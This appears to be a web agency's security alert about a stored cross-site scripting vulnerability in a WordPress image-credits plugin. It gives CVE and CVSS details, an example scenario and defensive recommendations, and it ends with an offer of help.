Security Alert Summary
The Image Source Control Lite – Show Image Credits and Captions plugin for WordPress is vulnerable to stored cross-site scripting (XSS) via the ‘Image Source’ attachment field in all versions up to and including 3.9.1. Authenticated attackers with Author-level access and above can inject scripts that will execute when an injected page is viewed.
CVE Details
- CVE ID:
CVE-2026-4852 - Affected plugin or component: Image Source Control Lite – Show Image Credits and Captions
- Affected versions: All versions up to and including 3.9.1
- Published: April 20, 2026 at 9:16:36 PM UTC
- Last modified: April 20, 2026 at 9:16:36 PM UTC
- CVSS v3.1: Base Score 6.4 (MEDIUM) –
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N - Authentication / Privileges / User Interaction: Authentication required: yes (Author-level or higher, per description). Privileges Required: LOW. User Interaction: NONE. Scope: CHANGED.
- Primary impact: Confidentiality: LOW; Integrity: LOW; Availability: NONE
- Weakness: CWE-79 (Cross-site Scripting)
Technical Details
The vulnerability is a stored XSS caused by insufficient input sanitization and missing output escaping of the ‘Image Source’ attachment field. An attacker with Author-level privileges can store malicious script content in that field, which is then rendered on pages where the field is displayed.
A referenced code location is the plugin view public/views/global-list.php, which indicates where unescaped output may be emitted. When a victim user views a page that includes the injected attachment field, the browser executes the injected script in the context of the site and the viewing user’s privileges.
The practical impact follows the reported CVSS effects: limited confidentiality and integrity impact (for example, exposure of data visible to the user or modification of rendered page content) and no reported availability impact.
How This Could Impact Your Website
Example scenario: an external contractor or contributor with Author-level access adds or edits an image attachment and injects a script into the ‘Image Source’ field. When an internal editor or the site owner views the gallery or page that lists that attachment, the injected script runs in their browser. This could expose information visible to that user (such as internal email addresses displayed in the interface) or alter displayed content, increasing the risk of targeted phishing or social engineering.
If you’re unsure whether your site is affected or how to assess your current user roles and plugins, it may be worth having a professional review your setup.
Recommended Actions
- Update the affected plugin as soon as a patched version is available.
- Review and reduce unnecessary user roles, especially contributors and authors.
- Enforce strong passwords and two-factor authentication for editors and administrators.
- Remove unused or unmaintained plugins.
- Monitor site activity and logs for unusual behavior, such as unexpected content changes or unfamiliar user actions.
If you’d like help reviewing your plugins, user roles, or overall WordPress security posture, our team at Freshy is happy to help.
